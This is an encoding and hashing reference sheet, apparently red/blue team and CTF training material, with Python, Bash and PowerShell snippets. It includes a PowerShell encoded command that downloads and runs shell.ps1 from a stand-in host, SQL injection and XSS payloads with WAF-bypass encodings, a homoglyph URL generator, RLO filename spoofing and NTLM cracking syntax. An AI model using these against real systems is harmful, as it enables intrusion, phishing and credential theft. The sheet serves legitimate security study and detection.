Encoding, Decoding & Data Manipulation — Ultimate Reference
CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.
Table of Contents
- Base Encoding
- Hex Encoding
- URL Encoding
- HTML Entities
- Unicode
- Hashing
- XOR
- ROT13 / ROT47 / Caesar
- JWT
- Regular Expressions for Security
- Obfuscation & Deobfuscation
- Serialization Security
- Compression Security
- Binary & Struct Manipulation
- CyberChef Reference
1. Base Encoding
Base64
Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.
import base64
# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext) # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded) # b'attack at dawn'
# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext) # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)
# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24" # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))
# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    # fullmatch avoids '$' matching before a trailing newline; '+' rejects empty input
    pattern = r'[A-Za-z0-9+/]+={0,2}'
    return bool(re.fullmatch(pattern, s)) and len(s) % 4 == 0
# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())
# Bash — encode/decode
echo -n "attack at dawn" | base64 # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d # attack at dawn
# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored
# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d
# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes) # YXR0YWNrIGF0IGRhd24=
$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded) # attack at dawn
# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64
Security notes:
- Base64 is NOT encryption. Attackers use it to bypass naive content filters.
- Double-base64 encoding is common in obfuscated payloads.
- Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
- PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.
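The notes on layered Base64 and -EncodedCommand can be sketched as two small helpers. The names peel_base64 and decode_ps_encoded_command are hypothetical, and the layer detection is a heuristic: short plaintext that happens to be valid Base64 (for example "test") would be decoded one layer too far.

```python
import base64
import binascii


def peel_base64(data: bytes, max_layers: int = 10) -> tuple[bytes, int]:
    """Strip Base64 layers until the data stops decoding cleanly (heuristic)."""
    layers = 0
    while layers < max_layers:
        stripped = data.strip()
        if not stripped:
            break
        try:
            # Re-add padding that cookies/JWT-style values often drop
            padded = stripped + b"=" * (-len(stripped) % 4)
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            break  # not valid Base64 any more: assume this is the payload
        if not decoded:
            break
        data, layers = decoded, layers + 1
    return data, layers


def decode_ps_encoded_command(b64: str) -> str:
    """Recover the script text passed to powershell -enc (UTF-16LE inside Base64)."""
    return base64.b64decode(b64).decode("utf-16-le")


double = base64.b64encode(base64.b64encode(b"attack at dawn"))
print(peel_base64(double))

enc = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
print(decode_ps_encoded_command(enc))
```

Capping the loop with max_layers keeps a hostile input from forcing unbounded work.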
Base32
Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.
import base64
encoded = base64.b32encode(b"attack at dawn") # b'MF2HIYLDNMQGC5BAMRQXO3Q='
decoded = base64.b32decode(encoded) # b'attack at dawn'
# Case insensitive decode
decoded = base64.b32decode(b"mf2hiyldnmqgc5bamrqxo3q=", casefold=True)
# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32 # MF2HIYLDNMQGC5BAMRQXO3Q=
echo "MF2HIYLDNMQGC5BAMRQXO3Q=" | base32 -d # attack at dawn
Base58
No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.
# pip install base58
import base58
encoded = base58.b58encode(b"attack at dawn") # bytes; 19 Base58 characters for this 14-byte input
decoded = base58.b58decode(encoded) # b'attack at dawn'
# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")
Base85 (Ascii85)
Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.
import base64
# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn") # 18 ASCII characters for 14 input bytes
decoded = base64.a85decode(encoded)
# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn") # also 18 characters, different alphabet
decoded = base64.b85decode(encoded)
# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"
Base encoding detection heuristics
| Encoding | Alphabet | Padding | Length multiple |
|---|---|---|---|
| Base64 | A-Za-z0-9+/ | = (0-2) | 4 |
| Base64url | A-Za-z0-9-_ | = or none | 4 |
| Base32 | A-Z2-7 | = (0-6) | 8 |
| Base58 | 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz | None | Variable |
| Base85 | !-u (ASCII 33-117) | None | 5 per 4 bytes |
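The table above can be turned into a rough classifier. This is a minimal sketch, assuming a hypothetical candidate_encodings helper. Alphabets overlap, so it returns every encoding the string could be rather than a single answer, and Base85 is left out because its alphabet covers most printable ASCII.

```python
import re

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def candidate_encodings(s: str) -> list[str]:
    """Return the encodings whose alphabet and length rules the string satisfies."""
    found = []
    if not s:
        return found
    if len(s) % 8 == 0 and re.fullmatch(r"[A-Z2-7]+={0,6}", s):
        found.append("base32")
    if len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        found.append("base64")
    # Unpadded base64url can have any length except 1 mod 4
    if re.fullmatch(r"[A-Za-z0-9_-]+={0,2}", s) and len(s.rstrip("=")) % 4 != 1:
        found.append("base64url")
    if all(c in BASE58_ALPHABET for c in s):
        found.append("base58")
    return found


print(candidate_encodings("YXR0YWNrIGF0IGRhd24="))
print(candidate_encodings("MF2HIYLDNMQGC5BAMRQXO3Q="))
```

Treat the result as a shortlist: confirm by decoding and checking whether the output looks meaningful.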
2. Hex Encoding
Hex to/from ASCII
# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex() # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode()) # '61 74 74 61 63 6b ...'
# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode() # 'attack at dawn'
# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))
# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x} {hex_part:<48} |{ascii_part}|')
# ASCII to hex
echo -n "attack at dawn" | xxd -p # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v
# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p # attack at dawn
# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20
# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''
# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
[Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)
Hex to/from Binary and Decimal
# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16) # 3735928559
back_to_hex = hex(decimal) # '0xdeadbeef'
# Hex <-> Binary
binary = bin(int("ff", 16)) # '0b11111111'
hex_from_bin = hex(int("11111111", 2)) # '0xff'
# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x') # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16)) # 192.168.1.1
# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'
shellcode_bytes = bytes.fromhex(shellcode_hex)
# Decimal to hex
printf '%x\n' 3735928559 # deadbeef
# Hex to decimal
echo $((16#deadbeef)) # 3735928559
printf '%d\n' 0xdeadbeef # 3735928559
# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc # DEADBEEF
3. URL Encoding
Single encoding
from urllib.parse import quote, unquote, quote_plus, unquote_plus
# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--") # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--") # "admin' OR 1=1--"
# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here") # "search+term+here"
decoded = unquote_plus("search+term+here") # "search term here"
# safe='' additionally encodes '/'; unreserved characters (letters, digits, - . _ ~) are never encoded
fully_encoded = quote("test", safe='') # 'test' (nothing to encode)
fully_encoded = quote("/path/file", safe='') # '%2Fpath%2Ffile'
Double encoding (WAF bypass)
from urllib.parse import quote
payload = "' OR 1=1--"
single = quote(payload, safe='') # %27%20OR%201%3D1--
double = quote(single, safe='') # %2527%2520OR%25201%253D1--
# Server that decodes twice will see the original payload
# First decode: %27%20OR%201%3D1--
# Second decode: ' OR 1=1--
# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')
Unicode URL encoding
from urllib.parse import quote
# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd") # standard
encoded = quote("\u2025") # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal
# IRI to URI conversion
iri = "https://example.com/path/\u00e9" # e-acute
uri = quote(iri, safe=':/@') # https://example.com/path/%C3%A9
# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not
# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"
# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search
# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"
# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")
# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")
Security notes:
- Double encoding bypasses WAFs that decode only once before rule matching.
- %00 (null byte) truncates strings in C-based parsers: file.php%00.jpg may bypass extension checks.
- %0d%0a = CRLF injection in HTTP headers.
- Path normalization differences between proxy and backend enable smuggling.
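On the defensive side, the double-encoding note suggests decoding until the value stops changing before applying any rule matching. A minimal sketch, assuming a hypothetical unquote_layers helper with a round limit:

```python
from urllib.parse import unquote


def unquote_layers(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """Percent-decode repeatedly until stable; return the result and layer count."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break  # nothing left to decode
        value, rounds = decoded, rounds + 1
    return value, rounds


print(unquote_layers("%2527%2520OR%25201%253D1--"))
```

A layer count above one is itself a useful signal, since legitimate clients rarely double-encode.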
4. HTML Entities
Named entities
import html
# Encode: escapes &, <, > and, with the default quote=True, also " and '
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'
# Encode with single quotes
encoded = html.escape("it's <dangerous>", quote=True)
# 'it&#x27;s &lt;dangerous&gt;'
# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;') # '&lt;' (only one layer decoded)
Numeric (decimal) entities
# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};' # '&#60;'
# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'
# Decode
import html
decoded = html.unescape('&#60;script&#62;')
# '<script>'
Hex entities
# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};' # '&#x3c;'
# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'
# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert(1)&lt;/script&gt;
# Decode all forms
import html
html.unescape('&lt;&#60;&#x3c;') # '<<<'
# Bash: decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"
# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"
Security notes:
- Browsers decode HTML entities in attribute values: <a href="&#106;avascript:alert(1)"> works with entities.
- Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
- Null bytes in entities: &#0; may bypass filters.
- Double encoding: &amp;lt; decodes to &lt; on first pass, < on second.
Quick reference table
| Character | Named | Decimal | Hex |
|---|---|---|---|
| < | &lt; | &#60; | &#x3c; |
| > | &gt; | &#62; | &#x3e; |
| & | &amp; | &#38; | &#x26; |
| " | &quot; | &#34; | &#x22; |
| ' | &apos; | &#39; | &#x27; |
| / | (none) | &#47; | &#x2f; |
5. Unicode
UTF-8 encoding internals
# UTF-8 byte representation
text = "cafe\u0301" # 'cafe' + combining acute accent (renders as "café")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex()) # 63616665cc81
# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X} {char!r:>10} {len(encoded)} bytes {encoded.hex()}")
# U+0041 'A' 1 bytes 41
# U+00E9 'é' 2 bytes c3a9
# U+4E16 '世' 3 bytes e4b896
# U+1F600 '😀' 4 bytes f09f9880
# UTF-8 byte ranges
# 0xxxxxxx -> 1 byte (U+0000 to U+007F)
# 110xxxxx 10xxxxxx -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)
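The byte-range layout above can be checked by packing the bits by hand. The sketch below uses hypothetical helper names and skips surrogate handling. It also builds the overlong 2-byte form of '/' to show that Python's strict decoder refuses it.

```python
def utf8_encode_manual(cp: int) -> bytes:
    """Encode one code point following the UTF-8 bit layout (no surrogate checks)."""
    if cp < 0x80:
        return bytes([cp])
    if cp < 0x800:
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    if cp < 0x10000:
        return bytes([0xE0 | (cp >> 12),
                      0x80 | ((cp >> 6) & 0x3F),
                      0x80 | (cp & 0x3F)])
    return bytes([0xF0 | (cp >> 18),
                  0x80 | ((cp >> 12) & 0x3F),
                  0x80 | ((cp >> 6) & 0x3F),
                  0x80 | (cp & 0x3F)])


def overlong_2byte(cp: int) -> bytes:
    """Build the forbidden 2-byte form of an ASCII code point (for testing parsers)."""
    return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])


def is_strict_utf8(raw: bytes) -> bool:
    """True if Python's strict UTF-8 decoder accepts the bytes."""
    try:
        raw.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


for ch in ["A", "\u00e9", "\u4e16", "\U0001f600"]:
    print(ch, utf8_encode_manual(ord(ch)).hex())

print(overlong_2byte(ord("/")).hex(), is_strict_utf8(overlong_2byte(ord("/"))))
```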
UTF-16 encoding
# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex()) # 630061006c0063002e00650078006500
# Decode
decoded = utf16le.decode('utf-16-le') # 'calc.exe'
# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>
# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00' # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41' # UTF-16-BE BOM + 'A'
Punycode (IDN homograph attacks)
# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com" # Cyrillic 'e' (U+0435) instead of Latin 'e'
# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna') # b'xn--xample-9uf.com'
# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna') # looks like 'example.com'
# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1
print(has_mixed_scripts("\u0435xample.com")) # True — mixed Cyrillic + Latin
# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"
# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null
Homoglyph attacks
# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'], # Cyrillic а
    'e': ['\u0435'], # Cyrillic е
    'o': ['\u043e', '\u03bf'], # Cyrillic о, Greek ο
    'p': ['\u0440'], # Cyrillic р
    'c': ['\u0441'], # Cyrillic с
    'x': ['\u0445'], # Cyrillic х
    'H': ['\u041d'], # Cyrillic Н
    'T': ['\u0422'], # Cyrillic Т
    'B': ['\u0412'], # Cyrillic В
    'A': ['\u0391'], # Greek Α
    'l': ['\u04cf', '\u0049'], # Cyrillic palochka, Latin I
    '0': ['\u041e'], # Cyrillic О
    '/': ['\u2044', '\u2215'], # Fraction slash, Division slash
}
# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)
# Detection: normalize and compare
# NFKC only folds compatibility forms (fullwidth, ligatures); it does not map
# Cyrillic or Greek look-alikes to Latin, so those need a confusables table.
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2
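NFKC alone leaves cross-script look-alikes untouched, so a comparison that should catch the Cyrillic "е" needs an explicit mapping step. The sketch below assumes a tiny illustrative table (CONFUSABLE_TO_ASCII) and hypothetical helper names. A real deployment would use the full Unicode confusables data instead.

```python
import unicodedata

# Illustrative subset only; not the complete Unicode confusables list
CONFUSABLE_TO_ASCII = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u03bf": "o",
}


def skeleton(s: str) -> str:
    """Fold compatibility forms and case, then map known look-alikes to ASCII."""
    folded = unicodedata.normalize("NFKC", s).lower()
    return "".join(CONFUSABLE_TO_ASCII.get(ch, ch) for ch in folded)


def looks_like(candidate: str, trusted: str) -> bool:
    """True when candidate differs from trusted but shares its skeleton."""
    return candidate != trusted and skeleton(candidate) == skeleton(trusted)


print(looks_like("\u0435xample.com", "example.com"))
print(looks_like("example.com", "example.com"))
```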
Zero-width characters (steganography / watermarking)
# Zero-width characters are invisible but present in text
ZWSP = '\u200b' # Zero-Width Space
ZWNJ = '\u200c' # Zero-Width Non-Joiner
ZWJ = '\u200d' # Zero-Width Joiner
ZWNS = '\ufeff' # Zero-Width No-Break Space (BOM)
# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str
def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')
# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data
# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found
# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)
Unicode normalization attacks
import unicodedata
# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another
s = "file\u0000.txt" # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC
# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e')) # '..'
print(unicodedata.normalize('NFKC', '\uff1c')) # '<'
print(unicodedata.normalize('NFKC', '\uff1e')) # '>'
# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e (fullwidth < and >)
# Backend normalizes NFKC: <script> -> XSS
# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe (is actually .exe)
6. Hashing
MD5 (128-bit, BROKEN for collision resistance)
import hashlib
# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'
# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()
echo -n "password" | md5sum # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd # file hash
$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()
Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe
SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)
sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'
echo -n "password" | sha1sum
sha1sum /bin/ls
SHA-256 (256-bit, current standard)
sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'
# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()
echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls
# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"
SHA-512 (512-bit)
sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'
echo -n "password" | sha512sum
NTLM (Windows password hash)
import hashlib
def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    # MD4 is provided by OpenSSL; OpenSSL 3 builds may raise ValueError unless the legacy provider is enabled
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()
print(ntlm_hash("Password1"))
# '64f12cddaa88057e06a81b54e73b949b'
# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system
# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"
# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null
Net-NTLMv2 (challenge-response, captured on the wire)
import hashlib
import hmac
import os
def compute_ntlmv2_response(password: str, user: str, domain: str,
                            server_challenge: bytes,
                            client_challenge: bytes | None = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)
    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()
    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()
    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here to the client challenge
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()
    return ntlmv2_response
# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt
Multi-hash utility
import hashlib
def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}
result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")
# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}
def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Additional heuristics
    if length == 32 and ':' not in h:
        # Could be MD5 or NTLM; length alone cannot tell, check context
        pass
    return candidates
# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null
# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'
# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'
7. XOR
Single-byte XOR
def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)
# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex()) # '233636232129622336622623352c'
# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext
Multi-byte XOR
from itertools import cycle
def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))
plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext
Single-byte XOR brute force
def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by printable ratio."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        printable = sum(1 for b in candidate if 32 <= b < 127)
        score = printable / max(len(candidate), 1)  # guard against empty input
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results
# Example: find key for XOR-encoded shellcode
# Printable ratio is a coarse score: on short inputs many keys tie at 100%
encoded = bytes([0x33, 0x26, 0x26, 0x33, 0x39, 0x29, 0x62, 0x33, 0x26, 0x62, 0x24, 0x33, 0x21, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")
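Because many keys can produce fully printable output, ranking candidates by how English-like they look tends to separate the real key better. The following is a rough sketch, not a tuned scorer: english_score and best_single_byte_key are hypothetical names, and the "etaoin shrdlu" letter set plus the penalty of 5 are arbitrary assumptions.

```python
COMMON = frozenset(b"etaoinshrdlu ")  # byte values of frequent English characters


def english_score(candidate: bytes) -> float:
    """Reward common letters and spaces, penalize non-printable bytes."""
    if not candidate:
        return 0.0
    score = 0
    for b in candidate:
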